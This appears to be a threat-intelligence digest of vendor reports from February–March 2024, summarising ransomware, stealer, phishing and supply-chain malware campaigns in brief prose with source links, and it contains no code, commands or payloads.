- Lookout researchers have identified an innovative phishing kit employing unique strategies to target both cryptocurrency platforms and the Federal Communications Commission (FCC) through mobile devices. Modeled after the techniques used by groups like Scattered Spider, this kit allows attackers to replicate single sign-on (SSO) pages. Subsequently, they employ a blend of email, SMS, and voice phishing to deceive targets into divulging usernames, passwords, password reset URLs, and even photo IDs from numerous victims, predominantly in the United States.
Source:
https://www.lookout.com/threat-intelligence/article/cryptochameleon-fcc-phishing-kit
—
- Intel Source:
- Trend Micro
- Intel Name:
- A_Multistage_Ransomware_Attack_Using_RA_World
- Date of Scan:
- 2024-03-04
- Impact:
- MEDIUM
- Summary:
- Researchers at Trend Micro have discovered a multi-stage attack known as RA World, which is aimed against multiple healthcare organizations in the Latin American region. The attack’s goal is to maximize the group’s operational impact and success.
Source:
https://www.trendmicro.com/en_us/research/24/c/multistage-ra-world-ransomware.html
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Airbnb_scam
- Date of Scan:
- 2024-03-01
- Impact:
- LOW
- Summary:
- The scammers send people emails that claim to be from Tripadvisor and contain links, but more alarm bells were triggered when the sender email showed up as [email protected] — not exactly the email address you’d expect from Tripadvisor itself. The scammer hoped people would click the booking button on the fake Tripadvisor site. If they had, they would have been prompted to register with ‘Tripadvisor’.
—
- Intel Source:
- Sonatype
- Intel Name:
- The_spread_of_Bladeroid_crypto_stealer_thru_npm_packages
- Date of Scan:
- 2024-03-01
- Impact:
- LOW
- Summary:
- Sonatype has identified multiple open source packages, named sniperv1 and sniperv2 among others, that infect npm developers with a Windows info-stealer and crypto-stealer called ‘Bladeroid.’ The info-stealer can be seen peeking into a user’s browser cookies and local storage data and attempting to steal saved (auto-fill) form data.
Source:
https://blog.sonatype.com/npm-packages-caught-spreading-bladeroid-info-stealer
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_DarkGate_Model_For_Malware_Delivery_and_Persistence
- Date of Scan:
- 2024-03-01
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have examined a typical phishing PDF, which resulted in the delivery of a far more dubious MSI signed with a legitimate code signing certificate and having an unexpectedly low signature-based detection rate on VirusTotal because of the utilization of multiple layered stages.
—
- Intel Source:
- CISA
- Intel Name:
- Active_Exploitation_of_Ivanti_Gateway_Vulnerabilities
- Date of Scan:
- 2024-03-01
- Impact:
- MEDIUM
- Summary:
- According to a new cybersecurity advisory from the Five Eyes intelligence alliance, the Ivanti Integrity Checker Tool (ICT) can be tricked into giving a false sense of security. Cyber threat actors are exploiting known vulnerabilities in the Ivanti Connect Secure and Ivanti Policy Secure gateways. Even after a factory reset, a threat actor may still be able to maintain root-level persistence, and the Ivanti ICT is insufficient to detect compromise. Since January 10, 2024, Ivanti has published five security flaws affecting its products; four of those are now being actively exploited by various threat actors to deploy malware.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Bifrost_New_Tactics_of_Domain_Deception
- Date of Scan:
- 2024-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers from Palo Alto have discovered a novel Linux version of Bifrost, also known as Bifrose, which demonstrates a creative way to avoid discovery. It makes use of a phony domain that imitates the official VMware domain. The goal of the most recent version of Bifrost is to sneak past security safeguards and infiltrate specific systems.
Source:
https://unit42.paloaltonetworks.com/new-linux-variant-bifrost-malware/
—
- Intel Source:
- The Hackers news, Phylum
- Intel Name:
- North_Korean_threat_actors_attacking_developers_with_suspicious_npm_packages
- Date of Scan:
- 2024-03-01
- Impact:
- LOW
- Summary:
- Phylum in their blog explained in depth an npm package posing as a code profiler that installs several malicious scripts, including a cryptocurrency and credential stealer. The attacker tried to hide the malicious code in a test file.
Source:
https://thehackernews.com/2024/02/north-korean-hackers-targeting.html
https://blog.phylum.io/smuggling-malware-in-test-code/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Exploring_Confluence_CVE_2022_26134
- Date of Scan:
- 2024-03-01
- Impact:
- LOW
- Summary:
- Researchers from ISC SANS have added daemonlogger to capture packets and Arkime to view the packets that their DShield sensor captured. They noticed that, up until now, this activity had only targeted TCP/8090, with base64-encoded payloads containing URLs. On February 12, 2024, the DShield sensor began recording this behavior as it came in from different IPs in different places.
Source:
https://isc.sans.edu/diary/Scanning+for+Confluence+CVE202226134/30704/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malvertising_Continues_to_Drop_Rhadamanthys
- Date of Scan:
- 2024-02-29
- Impact:
- LOW
- Summary:
- The first time the Rhadamanthys stealer was spotted in public, it was transmitted through malicious advertisements just over a year ago. Malwarebytes researchers have seen a persistence of software download-related malvertising chains in 2023.
—
- Intel Source:
- Hunt
- Intel Name:
- The_Lazarus_group_targets_blockchain_community
- Date of Scan:
- 2024-02-29
- Impact:
- MEDIUM
- Summary:
- Hunt is tracking an ongoing sophisticated phishing campaign targeting individuals in the Telegram groups focused on the blockchain and angel investing communities, specifically entrepreneurs. The tactics described below are strikingly similar to those previously attributed to the Lazarus Group, a North Korean state-sponsored threat actor.
Source:
https://hunt.io/blog/suspected-north-korean-hackers-target-blockchain-community-via-telegram
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_Escalation_of_Web_API_Cyber_Attacks_this_year
- Date of Scan:
- 2024-02-29
- Impact:
- LOW
- Summary:
- The landscape of cyber security is continuously evolving, with Web Application Programming Interfaces (APIs) becoming a focal point for cyber attackers. APIs, which facilitate communication between different software applications, present a broader attack surface than traditional web applications. This exposure is due to the inherent vulnerabilities within Web APIs that can lead to authentication bypasses, unauthorized data access, and a range of malicious activities.
—
- Intel Source:
- Krebsonsecurity
- Intel Name:
- Spread_Mac_Malware_thru_Calendar_Meeting_Links
- Date of Scan:
- 2024-02-29
- Impact:
- LOW
- Summary:
- Malicious hackers are targeting people in the cryptocurrency space in attacks that start with a link added to the target’s calendar at Calendly, an application for scheduling appointments and meetings. The attackers impersonated established cryptocurrency investors and asked to schedule a video conference call. But clicking the meeting link provided by the scammers prompts the user to run a script that quietly installs malware on macOS systems.
Source:
https://krebsonsecurity.com/2024/02/calendar-meeting-links-used-to-spread-mac-malware/
—
- Intel Source:
- Hunter
- Intel Name:
- Affiliate_TTPs_For_BlackCat_Ransomware
- Date of Scan:
- 2024-02-29
- Impact:
- HIGH
- Summary:
- In less than three minutes, the threat actor was able to download a copy of the ransomware executable to the endpoint through the second identified ScreenConnect instance. In response to the file being quarantined, the threat actor temporarily disabled Windows Defender before downloading the executable file once more and successfully launching it.
Source:
https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
—
- Intel Source:
- CISA
- Intel Name:
- The_Phobos_ransomware_variants
- Date of Scan:
- 2024-02-29
- Impact:
- MEDIUM
- Summary:
- The FBI, CISA, and MS-ISAC are releasing this joint CSA to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting. Phobos is structured as a ransomware-as-a-service (RaaS) model. Since May 2019, Phobos ransomware incidents impacting state, local, tribal, and territorial (SLTT) governments have been regularly reported to the MS-ISAC. These incidents targeted municipal and county governments, emergency services, education, public healthcare, and other critical infrastructure entities to successfully ransom several million U.S. dollars.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a
—
- Intel Source:
- Zscaler
- Intel Name:
- SPIKEDWINE_With_WINELOADER_Targets_European_Diplomats
- Date of Scan:
- 2024-02-29
- Impact:
- MEDIUM
- Summary:
- Researchers at Zscaler have found a suspicious PDF file that was posted to VirusTotal on January 30, 2024, from Latvia. Disguised as a letter from the Indian ambassador, this PDF file invites ambassadors to a wine tasting in February 2024. Additionally, the PDF contained a link to a fictitious questionnaire that starts the infection chain by sending users to a malicious ZIP archive housed on a compromised website. They found another similar PDF file uploaded to VirusTotal from Latvia in July 2023 after conducting additional threat research.
Source:
https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader
—
- Intel Source:
- McAfee Labs
- Intel Name:
- GUloader_Encryption_Strategies_Unmasked
- Date of Scan:
- 2024-02-29
- Impact:
- LOW
- Summary:
- McAfee researchers have unmasked GUloader’s encryption strategies and the threat posed by the malicious SVG files used to deliver it. GUloader utilizes dynamic structural changes, employing polymorphic code and encryption to effectively hide from antivirus software and intrusion detection systems.
—
- Intel Source:
- Infoblox
- Intel Name:
- Savvy_Seahorse_tricks_victims_to_fake_investment_platforms
- Date of Scan:
- 2024-02-29
- Impact:
- LOW
- Summary:
- Savvy Seahorse is a DNS threat actor who convinces victims to create accounts on fake investment platforms and deposit funds into a personal account, then transfers those deposits to a bank in Russia. This actor uses Facebook ads to lure users into their websites and ultimately enroll in fake investment platforms. The campaign themes often involve spoofing well-known companies like Tesla, Facebook/Meta, and Imperial Oil, among others.
—
- Intel Source:
- IC3
- Intel Name:
- MooBot_Threat_Detected_on_Ubiquiti_EdgeRouters
- Date of Scan:
- 2024-02-28
- Impact:
- MEDIUM
- Summary:
- In a new joint advisory, cybersecurity and intelligence agencies from the U.S. and other countries are urging users of Ubiquiti EdgeRouter to take protective measures, weeks after a botnet comprising infected routers was felled by law enforcement as part of an operation codenamed Dying Ember. The MooBot botnet is being utilized by APT28, a threat actor associated with Russia, to enable clandestine cyber operations and disseminate personalized malware for subsequent exploitation. Connected to the Russian Federation’s Main Directorate of the General Staff (GRU), APT28 has been operational since at least 2007.
—
- Intel Source:
- Bitdefender
- Intel Name:
- New_Variant_of_Atomic_Stealer_in_the_wild
- Date of Scan:
- 2024-02-28
- Impact:
- MEDIUM
- Summary:
- During some investigations, the Bitdefender team was able to isolate multiple suspicious and undetected macOS disk image files that were surprisingly small for files of this kind (1.3 MB per file). The new variant drops and uses a Python script to stay covert. The malware also shares a similar code with the RustDoor backdoor.
—
- Intel Source:
- JPCert
- Intel Name:
- Lazarus_new_malicious_PyPI_packages
- Date of Scan:
- 2024-02-28
- Impact:
- MEDIUM
- Summary:
- JPCERT/CC has confirmed that Lazarus has released malicious Python packages to PyPI, the official Python package repository.
Source:
https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html
—
- Intel Source:
- Bitdefender
- Intel Name:
- Cactus_ransomware_attack_on_corporate_networks
- Date of Scan:
- 2024-02-28
- Impact:
- MEDIUM
- Summary:
- Bitdefender Labs recently investigated an attack that illustrates the growing risk of ransomware attacks. The attack was orchestrated by the threat actor CACTUS, who began by exploiting a software vulnerability less than 24 hours after its initial disclosure. Bitdefender views this as a case of a publicly known Remote Code Execution (RCE) proof-of-concept (POC) left unaddressed for over 24 hours, and suspects that the systems were compromised with a web shell.
—
- Intel Source:
- CISA
- Intel Name:
- The_ALPHV_Blackcat_ransomware_updates
- Date of Scan:
- 2024-02-28
- Impact:
- HIGH
- Summary:
- The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known IOCs and TTPs associated with the ALPHV Blackcat ransomware as a service (RaaS) identified through FBI investigations as recently as February 2024.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a
—
- Intel Source:
- Mandiant
- Intel Name:
- Ivanti_Connect_Secure_VPN_Vulnerabilities_Exploited_by_China_Linked_Threat_Actors
- Date of Scan:
- 2024-02-28
- Impact:
- LOW
- Summary:
- This article explores the investigation into the exploitation and persistence attempts of Ivanti Connect Secure VPN vulnerabilities in a series called “Cutting Edge, Part 3.” Additionally, Mandiant has identified UNC5325 employing living-off-the-land techniques and deploying new malware like LITTLELAMB to enhance evasion of detection.
Source:
https://www.mandiant.com/resources/blog/investigating-ivanti-exploitation-persistence
—
- Intel Source:
- Mandiant
- Intel Name:
- Iranian_Threat_Actor_UNC1549_Targets_Israeli_and_Middle_East_Aerospace_and_Defense_Sectors
- Date of Scan:
- 2024-02-28
- Impact:
- MEDIUM
- Summary:
- Mandiant shared their blog post about suspected Iran espionage activity attacking the aerospace, aviation, and defense industries in Middle Eastern countries, including Israel and the United Arab Emirates (UAE) and possibly Turkey, India, and Albania. Mandiant links this activity with some confidence to the Iranian actor UNC1549, which overlaps with Tortoiseshell—a threat actor that has been publicly linked to Iran’s Islamic Revolutionary Guard Corps (IRGC).
Source:
https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east
—
- Intel Source:
- PaloAlto
- Intel Name:
- Possible_Imposter_Ransomware_Impersonating_LOCKBIT_4
- Date of Scan:
- 2024-02-28
- Impact:
- HIGH
- Summary:
- There is a lot of interest in LockBit 4.0 now that it is back online following its disruption in February 2024. Similar to others, PaloAlto researchers have discovered potential imposters using the Lockbit 4.0 identity on VirusTotal.
Source:
https://twitter.com/Unit42_Intel/status/1762570867291070880
—
- Intel Source:
- Palo Alto
- Intel Name:
- Exploring_DLL_Hijacking
- Date of Scan:
- 2024-02-28
- Impact:
- MEDIUM
- Summary:
- Unit 42 Palo Alto explained in their article how threat actors use DLL hijacking in malware attacks. It also shares ideas for how to better detect DLL hijacking and best practices on how to reduce the risk of attack. Dynamic-link library (DLL) hijacking is one of the oldest techniques that both threat actors and offensive security professionals continue to use today.
Source:
https://unit42.paloaltonetworks.com/dll-hijacking-techniques/#post-132679-_ydqdbjg0dngh
—
- Intel Source:
- Huntress
- Intel Name:
- Adversaries_Exploiting_ScreenConnect_Vulnerability_SlashAndGrab
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Huntress has observed a surge in threat actor activity exploiting the ScreenConnect vulnerability dubbed “SlashAndGrab.” This article details various post-exploitation tradecraft employed by adversaries, including deploying ransomware (e.g., LockBit), running cryptocurrency miners, installing additional remote access tools (e.g., Simple Help, SSH, Google Chrome Remote Desktop), dropping Cobalt Strike beacons, and establishing persistence through user creation and reverse shell techniques. The article emphasizes the need for continued vigilance and highlights the importance of a proactive and experienced security approach to thwart adversaries.
—
- Intel Source:
- The DFIR Report
- Intel Name:
- The_Gootloader_Tale_Goes_On
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Researchers from the DFIR report have discovered an intrusion in February 2023. The intrusion was caused by a user downloading and running a file from an SEO-poisoned search result, which resulted in a Gootloader infection. By using SystemBC to tunnel RDP access into the network, the threat actor was able to compromise backup servers, domain controllers, and other important systems.
Source:
https://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/
—
- Intel Source:
- Any.Run
- Intel Name:
- Examining_DCRat_in_Depth
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Initially released in 2018, DCrat, also referred to as Dark Crystal RAT, is a remote access trojan (RAT). This malware is modular, meaning it may be altered to carry out various functions. For example, it can take over Steam and Telegram accounts, steal passwords, and get information from cryptocurrency wallets. DCrat can be distributed by attackers in a number of ways, although phishing email operations are the most popular.
—
- Intel Source:
- Bitsight
- Intel Name:
- InstallsKey_PPI_Service_Malware
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- A new string encryption method and an alternate communication protocol have been added to PrivateLoader, a popular malware downloader. In addition, it is now downloading a duplicate of itself in addition to its other payloads. The commercial packer VMProtect is used to pack recent samples, which makes them more difficult to decipher and reverse engineer.
Source:
https://www.bitsight.com/blog/hunting-privateloader-malware-behind-installskey-ppi-service
—
- Intel Source:
- Elastic
- Intel Name:
- The_observed_new_PIKABOT_campaigns
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Elastic Security Labs discovered new PIKABOT campaigns, including an updated version of the loader. PIKABOT is a widely deployed loader that malicious actors utilize to distribute additional payloads.
Source:
https://www.elastic.co/security-labs/pikabot-i-choose-you
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Abyss_Locker_ransomware_roundup_report
- Date of Scan:
- 2024-02-27
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs monitors and collects data on ransomware variants of interest that have been gaining traction within their datasets and the OSINT community. This time they reported that the ransomware roundup covers the Abyss Locker (AbyssLocker) ransomware.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-abyss-locker
—
- Intel Source:
- Morphisec
- Intel Name:
- New_Version_of_IDAT_Loader_Pushes_Remcos_RAT_with_Steganography
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Researchers at Morphisec Threat Labs have found several indicators of attacks attributed to threat actor UAC-0184. This finding sheds light on the infamous IDAT loader that delivered the Remcos Remote Access Trojan (RAT) to a Ukrainian organization headquartered in Finland.
Source:
https://blog.morphisec.com/unveiling-uac-0184-the-remcos-rat-steganography-saga
—
- Intel Source:
- Forcepoint
- Intel Name:
- Agent_Tesla_malware_targets_travel_industry
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Forcepoint analysts analyzed an Agent Tesla campaign that is delivered via email as a PDF attachment and ends up downloading a RAT, leaving the system infected. The email was an example of scamming and brand impersonation where the sender is seeking a refund of a reservation made at Booking.com and asking the recipient to check the attached PDF for the card statement.
Source:
https://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Scripts_Exploit_Telegram_for_User_Information_Theft
- Date of Scan:
- 2024-02-27
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Intelligence Center (ASEC) has identified a surge in phishing scripts utilizing Telegram for the indiscriminate distribution of malicious content, often themed around remittances and receipts. These sophisticated scripts, unlike their predecessors, employ obfuscation techniques to evade detection. Upon interaction, users are prompted to enter a password, enabling threat actors to steal sensitive information, including email addresses and passwords. The stolen data is then transmitted to the attackers via the Telegram API. This method of leveraging Telegram for information theft is becoming increasingly prevalent, emphasizing the importance of vigilance against suspicious files and websites.
—
- Intel Source:
- SOC Radar
- Intel Name:
- The_Dark_Web_Profile_of_Patchwork_APT
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- The Patchwork APT group is an Indian cyber espionage group that was discovered in December 2015; however, it is likely that it has been operating since 2009. Targeting high-profile organizations in South and Southeast Asia, but increasingly expanding to other regions, it primarily targets defense, diplomatic, and government agencies. Patchwork is a prominent threat in the cyber threat landscape because it uses a variety of specialized tools and techniques for espionage, including spear phishing and watering hole attacks.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Black_Basta_Exploiting_ScreenConnect_Vulnerabilities
- Date of Scan:
- 2024-02-27
- Impact:
- HIGH
- Summary:
- Researchers from TrendMicro have thoroughly examined the most recent ScreenConnect vulnerabilities. They also talk about how the data led them to identify threat actor groups that are actively using CVE-2024-1708 and CVE-2024-1709, such as the Black Basta and Bl00dy Ransomware gangs.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- TimbreStealer_campaign_targets_Mexican_users
- Date of Scan:
- 2024-02-27
- Impact:
- LOW
- Summary:
- Cisco Talos has discovered a new campaign operated by a threat actor distributing a previously unknown malware that Talos is calling “TimbreStealer.” This threat actor was observed distributing TimbreStealer via a spam campaign using Mexican tax-related themes starting in at least November 2023. The threat actor has previously used similar tactics, techniques, and procedures (TTPs) to distribute a banking trojan known as “Mispadu.”
Source:
https://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_new_remote_access_trojan_Xeno_RAT
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- Cyfirma provided deep analyses on the proliferation of Xeno RAT malware, crafted with advanced functionalities, conveniently accessible at no cost on GitHub. Xeno RAT possesses sophisticated functionalities and characteristics of advanced malware. A threat actor customized its settings and disseminated it via the Discord CDN.
Source:
https://www.cyfirma.com/outofband/xeno-rat-a-new-remote-access-trojan-with-advance-capabilities/
—
- Intel Source:
- Trendmicro
- Intel Name:
- Dissecting_Earth_Luscas_Espionage_Campaign_Leveraging_Geopolitical_Lures
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- Trend Micro’s investigation has uncovered a cyber espionage campaign by Earth Lusca, a China-linked threat actor, exploiting Chinese-Taiwanese tensions. Active around the Taiwanese national elections in late 2023 to early 2024, the campaign used spear-phishing with geopolitical lures to deliver a complex, multi-stage infection process, ultimately deploying Cobalt Strike payloads. Further analysis suggests a link between Earth Lusca and the Chinese company I-Soon, indicating a broader network of cyber espionage tied to Chinese interests. This campaign highlights the ongoing risks of state-linked cyber operations targeting politically sensitive entities.
—
- Intel Source:
- Stratosphereips Blog
- Intel Name:
- Analysis_of_the_PyRation_family_malware
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- Stratosphereips researchers wrote a blog post with a technical analysis of malware they link to a variant of the “PyRation” family. This malware is a Python executable packaged as a Windows PE file, meaning it works only on Windows.
—
- Intel Source:
- Phylum
- Intel Name:
- NovaStealer_Deployer
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- The article discusses a recent discovery by the Phylum Research Team of a dormant PyPI package, django-log-tracker, that was updated to deploy the NovaSentinel stealer. The update included malicious code, indicating a calculated strategy by an attacker or a compromise of the PyPI account. The malware was found to be a form of steal-everything-you-can-find, designed to steal sensitive information. The article also highlights the risks of supply-chain attacks through compromised PyPI accounts and urges developers to be cautious when using open-source software.
Source:
https://blog.phylum.io/dormant-pypi-package-updated-to-deploy-novasentinel-stealer/
—
- Intel Source:
- ASEC
- Intel Name:
- Uncovering_Nood_RAT_Persistent_Linux_Threat
- Date of Scan:
- 2024-02-26
- Impact:
- MEDIUM
- Summary:
- The AhnLab Security Intelligence Center (ASEC) has reported the discovery and ongoing analysis of Nood RAT, a Linux-targeting malware variant of the widely known Gh0st RAT. Originating from a lineage of malware with open-source roots primarily utilized by Chinese-speaking threat actors, Nood RAT has been actively used in cyber attacks since 2018, exploiting vulnerabilities across various systems. This malware exhibits sophisticated capabilities, including masquerading as legitimate processes, encrypted communication with command and control (C&C) servers, and executing malicious activities such as file manipulation and proxy usage. Despite its simplicity, Nood RAT’s evasion techniques and the breadth of its deployment highlight the critical need for up-to-date system security and vigilant monitoring to combat such threats.
—
- Intel Source:
- NCC Group
- Intel Name:
- Unmasking_Lorenz_Ransomware
- Date of Scan:
- 2024-02-26
- Impact:
- MEDIUM
- Summary:
- The article discusses the evolving tactics of the ransomware group Lorenz, which has been targeting small to medium businesses globally. The group has recently adopted double-extortion tactics and made changes to their encryption methods and file names. They also use scheduled tasks and local admin accounts for persistence. The article provides indicators of compromise and stresses the need for continuous monitoring to stay protected against ransomware threats.
—
- Intel Source:
- Talos
- Intel Name:
- TikTok_Misinformation_Combat
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- The article discusses TikTok’s efforts to address misinformation and disinformation on their platform, emphasizing that this is a global issue. It also mentions the use of Google Cloud Run for distributing malware and provides updates on cybersecurity news and events.
Source:
https://blog.talosintelligence.com/threat-source-newsletter-feb-22-2024/
—
- Intel Source:
- Esentire
- Intel Name:
- Blind_Eagle_Targets_Manufacturing_with_Advanced_Crypters_and_Payloads
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- Blind Eagle threat actors have been observed targeting the manufacturing sector, distributing malicious VBS files through phishing emails containing links to RAR and BZ2 archives. eSentire observed Blind Eagle threat actor(s) targeting Spanish-speaking users in the manufacturing industry based in North America.
Source:
https://www.esentire.com/blog/blind-eagles-north-american-journey
—
- Intel Source:
- CERT-UA
- Intel Name:
- Targeted_Cyber_Attack_Against_Ukrainian_Defense_Forces_Thwarted
- Date of Scan:
- 2024-02-26
- Impact:
- LOW
- Summary:
- Ukrainian cybersecurity teams thwarted a targeted cyber attack against the Ukrainian Defense Forces, delivered via a malicious Excel document spread through Signal messenger. The attack involved a complex chain of actions including the execution of a malicious PowerShell script, COOKBOX, designed to compromise and control affected systems. The attack, part of ongoing efforts since autumn 2023, exploited systems lacking basic security measures. The response highlighted the critical role of advanced security technologies like EDR in preventing such breaches and underscored the necessity for immediate implementation of comprehensive security policies to protect against sophisticated cyber threats.
—
- Intel Source:
- Bitdefender
- Intel Name:
- Critical_ConnectWise_ScreenConnect_Authentication_Bypass
- Date of Scan:
- 2024-02-26
- Impact:
- HIGH
- Summary:
- On February 19, 2024, ConnectWise released a security patch addressing two vulnerabilities in the ScreenConnect software, potentially leading to Remote Code Execution (RCE). These vulnerabilities, identified as CVE-2024-1709 and CVE-2024-1708, allow attackers to bypass authentication and perform path traversal, respectively, enabling unauthorized access and administrative privilege escalation.
—
- Intel Source:
- Uptycs
- Intel Name:
- 8220_Group_Gang_Launches_Cryptomining_Campaign
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
- Uptycs researchers have discovered a new cryptomining campaign conducted by the 8220 Group, targeting both Linux and Windows systems. This recent campaign stands out due to the use of Windows PowerShell for fileless execution, resulting in the deployment of a cryptominer. What distinguishes this campaign is its adoption of unique techniques, such as DLL sideloading, User Account Control (UAC) bypass, and modifications to AMSIscanBuffer and ETWEventWrite. These tactics represent a novel approach, highlighting the group’s innovative methods to enhance stealth and evasion, setting it apart from previous incidents. Notably, the Linux campaign showed no significant alterations in its tactics.
Source:
https://www.uptycs.com/blog/8220-gang-cryptomining-cloud-based-infrastructure-cyber-threat
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_abuses_a_valid_certificate_to_distribute_TrollAgent
- Date of Scan:
- 2024-02-23
- Impact:
- MEDIUM
- Summary:
- A malicious TrollAgent malware was found to be downloaded when attempting to install security software from a South Korean construction association website. The malware can steal information and receive commands from attackers. Users should keep antivirus software updated to prevent infection.
—
- Intel Source:
- Esentire
- Intel Name:
- The_Pikabot_rising_threat
- Date of Scan:
- 2024-02-23
- Impact:
- MEDIUM
- Summary:
- The article “The Rising Threat of Pikabot” by eSentire discusses the increasing danger of the Pikabot malware and the capabilities of eSentire’s 24/7 Security Operations Centers (SOCs) in responding to threats. The article also highlights the TRU team’s discovery of other dangerous threats, such as the Kaseya MSP breach and the more_eggs malware. The article provides a detailed analysis of the Pikabot malware, including its initial infection through a phishing email and its use of obfuscation techniques. It also explains how Pikabot is injected into the SearchProtocolHost.exe process and its functionality to gather host information and check for specific language settings. The article also discusses additional insights, such as unsuccessful infection attempts and recommendations from the TRU team for the prevention and detection of Pikabot.
Source:
https://www.esentire.com/blog/the-rising-threat-of-pikabot
—
- Intel Source:
- Crowdstrike
- Intel Name:
- LATAM_Malware_Variants
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
- The article provides an overview of updates and changes made to various malware families targeting users in Latin America (LATAM) in 2023. These include Mispadu, Kiron, Caiman, Culebra, Salve, and Astaroth, which primarily target users in Brazil, Spain, Italy, and Australia. The updates include the use of CAPTCHAs, new components in the infection chain, and new obfuscation methods. The article also discusses the potential overlap between Mispadu and Astaroth, as well as a new threat called Doit. It then delves into the technical details of these malware variants, including encryption and decryption methods, deployment chains, and C2 protocols. The article also provides recommendations to avoid or detect eCrime commodity malware infections and lists indicators of compromise. It concludes by discussing a new Brazilian-based adversary, SAMBA SPIDER, and providing details on specific malware families and their tactics, techniques, and procedures. The article also includes a case study of updates made to the Caiman downloader in September 2023.
Source:
https://www.crowdstrike.com/blog/latin-america-malware-update/
—
- Intel Source:
- Sentinel Labs
- Intel Name:
- Russian_Aligned_Influence_Operation_Affecting_German_Audiences
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
- Researchers at SentinelLabs have closely monitored the activities of an alleged Russia-aligned influence operation network named Doppelgänger. Their observations reveal that Doppelgänger has been specifically targeting German audiences, a trend aligned with recent reports from the German Ministry of Foreign Affairs and Der Spiegel.
Source:
https://www.sentinelone.com/labs/doppelganger-russia-aligned-influence-operation-targets-germany/
—
- Intel Source:
- Esentire
- Intel Name:
- The_DarkVNC_Technical_Analysis
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
- DarkVNC is a hidden utility based on VNC technology, used for stealthy remote access. It was advertised in 2016 and received updates until 2017. DarkVNC has been used by threat actors associated with IcedID and SolarMarker campaigns. This analysis focuses on a DarkVNC sample that uses ‘vncdll64.dll’ for exporting functions. It generates a unique ID to send to the C2 server along with system info. DarkVNC can search for and manipulate windows related to the desktop environment. It can also control the state of devices like keyboard and mouse, and block user input. The malware gathers details on the Chrome browser install and runs cmd prompts. Detection and prevention controls like EDR solutions and training programs are recommended.
Source:
https://www.esentire.com/blog/technical-analysis-of-darkvnc
—
- Intel Source:
- Sucuri
- Intel Name:
- Angel_Crypto_Drainer
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
- The article discusses the growing threat of Web3 crypto malware, specifically the Angel Drainer, which targets individuals interested in cryptocurrencies and NFTs. The authors provide an overview of the current list of top level domains maintained by IANA and mention a placeholder domain used by the malware. They also discuss the use of the “Ipsum” domain in phishing sites and the high number of scans recorded by URLScan.io. The article provides statistics on the number of unique domain names and titles associated with the malware, as well as the top three second level domains used. It also discusses the steps website owners can take to protect their sites from these types of attacks. The authors then delve into the specifics of the Angel Drainer malware, including its use of crypto drainers to steal and redistribute assets from compromised wallets. They also mention the surge in malicious activity linked to recent security breaches and the use of phishing tactics to trick users into giving up their cryptocurrency assets. The article also discusses the benefits of using a web application firewall and offers services to remove malware infections and secure websites. The authors provide an analysis of the threat of malicious injections in the Web3 ecosystem and describe a specific malware injection targeting WordPress sites. They also discuss the various waves of attacks carried out by the Angel Drainer malware and provide information on the top 50 most common titles for phishing pages used by the drainer. The article also mentions the use of an ACCESS_KEY by the drainer and its connection to the Rilide Stealer. It also provides information on phishing subdomains on the website Vercel.app and the number of phishing web.app subdomains found in relation to Firebase Hosting. The authors also discuss a new type of malware that targets Web3 crypto users and provides details on the different versions of the malware. They also mention the investigation into a malware that impersonates the BillionAir Web3 gambling platform and provide information on suspicious requests made by the drainer. The article concludes by mentioning the 530 phishing pages found on subdomains of the website pages.dev, which is hosted on Cloudflare Pages.
Source:
https://blog.sucuri.net/2024/02/web3-crypto-malware-angel-drainer.html
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Anti_Sandbox_Techniques
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
